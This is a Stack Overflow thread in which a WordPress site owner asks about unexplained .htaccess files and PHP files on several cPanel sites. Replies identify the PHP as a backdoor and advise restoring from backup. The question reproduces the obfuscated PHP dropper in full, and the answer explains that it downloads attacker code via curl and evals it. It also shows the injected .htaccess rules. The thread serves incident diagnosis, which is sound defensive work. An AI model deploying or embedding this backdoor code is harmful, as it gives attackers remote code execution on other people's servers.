# I have a strange php file that appeared throughout my different wordpress websites in cpanel's file manager

Tags: php, wordpress, cpanel

I have a question similar to what is said in this unanswered topic here :

[There is an unwanted .htaccess file with "Order Allow,Deny" in all my wordpress subfolders](https://stackoverflow.com/questions/65895783/there-is-an-unwanted-htaccess-file-with-order-allow-deny-in-all-my-wordpress)

with some of this one here :

[Admin links shows 404 WordPress](https://stackoverflow.com/questions/68977750/admin-links-shows-404-wordpress)

Meaning that I found different unwanted htaccess files (or rather, files that I don't recall placing there) in the different wordpress folders in my Cpanel file manager. I don't know if it's related, but when I access the wp-admin of different websites I can't get to plugins interface or media from the dashboard because I get a 404 not found. Some files are written like "htaccess.ht" or "htaccess.bk" and look like this :

```
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
```

Or like this :

```
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$"\>
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$"\>

Order allow,deny
Allow from all

</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
```

It doesn't look too much of a threat, but it still begs the question...

Stranger than that, different php files with different names have appeared all around, with always the same code inside :

```
<?php 
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 

$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d"; 

$AmineDns = "=UvmLf1PNqJF8Isk5oJJuCJbUnKE6V8MRlbdTH+LGS1rsNXfL7l+n7Z/zCc/0x76Pb1S4Q1gnj2KXGz/67Id57kEDyc1UpM29Srl73G1iNKDVNmu7vb7KPTX1aFGuy1qdMbXq2KT3Mvry4TdSwScm1FI4ybP1C1NMqU4iVsCWrvML+PbemQVOpQ5WlDCgHIEr7ZEbVBmpjAGy7IQXGT8XiUlC2q8XcDgRViOGxnYZuAk7ADk8C+gCMl7PC9uHb3PKh96n88SVENqonNW/EHNrC2Rq4wrfCiJY+UaAYFm0ug+o/MgNITG3hZaGicIMZr7WoQqam/s1YOlD3L5CMdMzq7gaQmvzeW6AMZB2zDB0OM+AY6CnGgqi5C6RwUJSe3WqQmkntsbUehG418D7s3O7MTO4RQkO9O8RKn0UrwQAKXgmSDatIGpPsqaE4CpJi0II1ktawUF8DBUC702QVFn45PoB8VA";/*2e3300cd40ea092e5eeb579abe01e85a*/ 

eval($co($ro($na($AmInE)))); 
exit; 
?>
```

when I UnPhp it it gives me the information below

[here's the output](https://i.stack.imgur.com/1lNuC.png)

So far :

- I've tried to use WP_DEBUG but I didn't get any messages related to the 404 error...
- I cannot add plugins to search for errors because well... I get a 404 when trying to get to the "add plugin" menu.
- I've tried getting rid of the unwanted htaccess files and making a new one by going in Tools > Permalinks > Save.
- In the error_log, I have several attempts of the wp_privacy_delete_old_export_files function that couldn't be sent..
- I've tried to update everything and reinstall wordpress's latest version, but I also got an error
- I've checked the wp-config file, plugin-install.php file... but found nothing unusual... Worst part is, all my plugins work perfectly I just.. Can't reach any dashboard and nothing works...

My question is this : should I be worried ? If it's a Mod_rewrite problem, I've already contacted Cpanel's support and all should be fixed. But still, if anyone can provide me with any information on the issue, it would be really nice of them !

Thank you for taking the time to read

**edit : ** Thank you very much ! I just built a clean install from backup, ran a security check, changed passwords and haven't seen anything strange since so I believe my issue is resolved. Will check on it from time to time to make sure

Comment: `eval($co($ro($na($AmInE)))); ` - thats... looks like a malware to me. does your ftp credentials secured? is the ftp server up to date? i reckon some shared hosting are bad enough to have a default admin account for their ftp and susceptible to dictionary attack.

Comment: _"should I be worried"_ Yes, your server has been compromised. It is likely not worth the effort to try and clean it. I would recommend building a clean install from backup. If you don't fix the underlying misconfiguration, cleaning gains you nothing. Step 1: The user that the web server process runs as should never have write access to the files it serves.

Comment: Looks very much like malware. I would highly recommend a deep security check. Just cleaned a WordPress site that had similar issues. See also here: https://support.cpanel.net/hc/en-us/community/posts/20823164242967-Can-a-hacker-have-access-to-all-the-websites-in-public-html

Comment: To reinforce the advice from @AlexHowansky, don't try to "clean" the site. That usually takes much longer and you might miss something. Delete everything and then restore from an uncompromised backup.

Answer (score 1):

The file you posted will ultimately call `curl_init` with the contents of `base64_decode($_GET['u'])`, use `curl_setopt` with "CURLOPT_RETURNTRANSFER" and then `curl_exec` the curl session if the content of `$_GET['pw']='A4E6EFC1125C4B651B389FC255259EE0'` and `eval` the result.

So it's a trojan horse, meant to connect to a server, download a file from there and excecute its content, which enables an attacker to fully remote execute any PHP script on your machine.

My advice is, if you can, to backup your DB, wipe your server clean, change your passwords and start over. Otherwise, at least wipe any directory where the user running PHP can write to, because it's entirely possible other malware has already been placed on your system.